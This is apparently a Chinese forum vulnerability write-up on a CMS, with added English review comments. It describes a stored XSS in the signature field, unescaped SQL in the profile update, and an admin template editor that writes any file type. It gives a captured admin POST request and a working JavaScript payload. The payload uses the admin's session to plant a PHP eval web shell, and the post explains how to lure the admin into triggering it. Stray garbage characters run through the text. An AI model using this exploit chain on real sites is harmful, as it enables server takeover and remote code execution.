这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
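<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php
  // Review fix: $cscms_qianm is the user-controlled signature, stored raw by user/do.php.
  // Echoing it unencoded inside <textarea> lets a crafted value close the tag and inject
  // markup/script (stored XSS). Encode on output; ENT_QUOTES also covers attribute contexts
  // if this value is reused elsewhere. Pass the site's charset as the third argument once
  // confirmed (UTF-8 vs GBK is not visible in this excerpt).
  echo htmlspecialchars($cscms_qianm, ENT_QUOTES);
?></textarea></td></tr>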
; g: E$ d* d/ v5 R0 e , S- h+ O, d2 `" f
user/do.php
) C1 d! t/ q! ?' x, K! }. ? f* x* B
; l% k1 ~/ g/ }/ p0 ]# W
// Handles op=zl (profile update): rewrites the current user's row with the submitted values.
// Review notes (defensive):
//  - Every value below is interpolated straight into the SQL string; nothing in this block
//    escapes or binds $CS_Nichen/$CS_Email/$CS_Sex/$CS_City/$CS_QQ/$CS_Qianm (presumably
//    request-derived — confirm in do.php's prologue, outside this excerpt). That makes this
//    an SQL injection sink as well as the stored-XSS sink the post describes; bind each value
//    with a prepared statement or the DB layer's escaping function.
//  - CS_Qianm is stored raw and skin_edit.php echoes it unencoded; output-encode there
//    (htmlspecialchars) rather than relying on storage-side filtering alone.
//  - CS_Sex is embedded unquoted, so it needs an integer cast/validation, not just quoting.
if($op=='zl'){ // profile (资料)
8 `* X$ Y/ p ?
// Presence check only: empty() rejects missing/"0" values but validates no format or length,
// and CS_Sex / CS_Qianm are not checked at all.
! |# g( e ?6 O, R if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) - k' H& g s- L/ G9 D5 f
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
# S9 L/ L* Q: y3 r3 L5 u1 [- n' f $ w! | L( W! q/ U+ |
// UPDATE statement assembled by string concatenation; the literal spans the next four lines.
// The WHERE clause is keyed on $cscms_name (the logged-in user's name), which is also
// interpolated unescaped.
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
, f7 }, Y' J# W+ ]+ }1 ?- |5 Y
+ \: {2 m& j" |' K1 ^ CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ d- C# W1 S2 D* c7 `' q
where CS_Name='".$cscms_name."'";4 Q7 G7 @9 d) t2 O3 x$ T# \& ?3 g
% u. d# L" M! I) B) f# G: p
// The query result is treated as truthy on success; both branches exit() after rendering a
// message and sending the browser back one page.
if($db->query($sql)){6 x0 _& m) R6 v7 e
6 _8 H- g1 u) q; J exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));; n0 E7 N5 X# @
, Q6 e! ^$ N+ d8 ^3 z; t/ e6 _ }else{
1 n+ P0 g7 d+ p9 [7 ]- y ! ^! W' t- e' y6 Y- _; Y2 y3 K
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
. K9 v! U( Q1 E0 q3 B! v! h) Y ! u: [0 {0 {' g3 u' K
}% X. S' K ]* Y/ e
! {7 r) t% k n1 c* m# `+ b, p+ T& w: m& `0 Y& j
存储（do.php）和输出（skin_edit.php）都没有过滤/编码，导致存储型 XSS。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包：
* B" a/ L, g. N3 C5 H
% d5 [+ @7 W9 q% ]+ v3 S! N* B
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
* z( W, h9 X/ @$ h% ]; ?+ p) AAccept: text/html, application/xhtml+xml, */*, x8 n/ A8 s4 z% W% ^$ w
( `7 J, w6 K7 Q" }4 q& ]Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; B. _/ ]1 J4 R( n
1 K5 A& L% ?( x, c4 e' h
Accept-Language: zh-CN3 G9 K: G7 K* x- G4 x
" r3 S% U: K2 ?4 k" d& Z: YUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)7 P% u0 z8 {: C8 C: M
& T( O' i0 m* T1 @- y0 kContent-Type: application/x-www-form-urlencoded
* c+ M9 s! g. S* K. V' n - y/ b7 j2 @- {! R: y1 [
Accept-Encoding: gzip, deflate" Q. K e* J1 \0 B0 l6 c2 Z
) X! b: |- W3 P, D& E# v, [6 m9 r1 SHost: 127.0.0.1- T3 Q6 Q: n8 ^7 ?1 f! ?! g
" B* m/ q/ U0 Z) E9 K
Content-Length: 38
9 g- M6 ^5 Y3 i$ i $ J- E5 t( T$ q l7 G
DNT: 1; f0 E9 r4 @/ ^! l/ V
' X$ _5 j' R, s: C: e$ CConnection: Keep-Alive/ z" F$ R0 D/ T- Q
6 }" E+ p+ k* _ a* j: e7 \" A! ]
Cache-Control: no-cache
$ g( t$ D+ E$ @- ^, c2 W % v+ W% |% J2 T! W) `- W
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655944 Y0 ^3 G! s3 Z6 L! E0 ]( o5 }
9 t5 I6 K9 M. |. O
. I5 Q. [* H& Q# k! d5 ]
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
" F% C0 @4 X$ f9 N! w6 e& ^, a, a' e+ T0 w+ X% `! b
' K: L, E5 t5 O! e& w
于是构造 JS 如下：
% {# T7 c( v E2 B8 E7 l8 r( f- K1 [) r: L# U/ p
本帖隐藏的内容<script>
// Review note: this is the script the post plants in the CS_Qianm (signature) field. It runs
// in an administrator's browser through the stored XSS and drives that already-authenticated
// session to POST to admin/skins/skins.php. The server-side conditions it depends on — and
// therefore the controls that neutralise it — are: the template editor accepts an arbitrary
// `name` (no extension allow-list, so a .php file is written), the `path` query value appears
// to be used as given (not canonicalised against the skins root), and the captured request
// above carries no anti-CSRF token. Output-encoding the signature in skin_edit.php removes
// the injection vector itself; a CSRF token or an extension allow-list stops the file write.
// Read the host from the page's own location so the payload targets whatever site serves it.
* }* C. @4 E: o% ^8 o4 @- Z7 QthisTHost = top.location.hostname;
N4 ~4 A# |7 G5 C Z7 \
// Target: the admin template editor, with `path` pointing into skins/index/html/.
% j4 V) l8 y! c, ^ Y2 mthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
0 ^; s7 |1 {' m( {1 P" U" s% h9 j, k4 u+ ~! x 3 A( m2 x) N, B( I" z: b
// Builds a hidden form with two fields, `name` (taken from `data`) and `content` (taken from
// `msg`), and auto-submits it as a POST to `url`. The parameter names are misleading: `data`
// becomes the filename field and `msg` becomes the file body.
function PostSubmit(url, data, msg) {
/ }6 K" S5 s" X var postUrl = url;. N7 L) Y, e6 D
# v# f z& ~/ m, j7 G( d var postData = data; ! S) S4 g8 ^* r5 X/ E: y
var msgData = msg;
// A form element is used (rather than XHR) so the submission is a plain top-level POST that
// carries the victim's cookies like any ordinary form.
4 x H4 c* s8 l var ExportForm = document.createElement("FORM"); , j |! H+ N: f5 E7 Q1 c% o
document.body.appendChild(ExportForm);
/ ]2 e) b* K5 ] c ExportForm.method = "POST"; : O! {& {# H* ~6 f( N& Z* ~
var newElement = document.createElement("input");
% m l [- K! w% x$ F newElement.setAttribute("name", "name");
6 I' @6 b9 ?, C& s7 | newElement.setAttribute("type", "hidden");
2 y" X- v0 s" F6 z& J9 T3 k var newElement2 = document.createElement("input");
. d) m4 I6 N9 A, _ newElement2.setAttribute("name", "content"); % S4 K M% [: ^( [9 ~! T' k5 [7 _0 w+ n
newElement2.setAttribute("type", "hidden");
1 T, l! L2 P- g$ M ExportForm.appendChild(newElement);
* n! E5 ]& k0 e5 _, X ExportForm.appendChild(newElement2);
// Field values mirror the captured request: name=<filename>, content=<file body>.
. Z2 J; A2 g C4 Z: [% d4 i newElement.value = postData;
, G& B& i) P# q# }/ R' V: D newElement2.value = msgData;
% A8 V+ U! \ I: ` ExportForm.action = postUrl; ; P7 a- z$ k2 F# P# u
// Submission navigates the admin's browser to the editor endpoint; nothing here is reversible.
ExportForm.submit();
' z, a0 h/ T7 v% C( q2 ~% g};6 W* L4 [# y0 ]! J1 d/ O
// Fires on page load: writes a PHP file into skins/index/html/, which is exactly why the
// editor must reject non-template extensions and require a CSRF token.
$ l8 T4 ~0 j- c. oPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
& h7 Y$ o( C2 s* Y% F! u ' }. o8 Q2 }7 F& R
</script>. D1 n5 S( {* r; D8 {) V1 Q$ W
" m: B5 t: g$ J! ]
3 f# M+ ^# b; l A6 g n4 E7 F
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入。
用你的账号给管理写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。
就会在 skins\index\html\ 目录下生成 roker.php 一句话。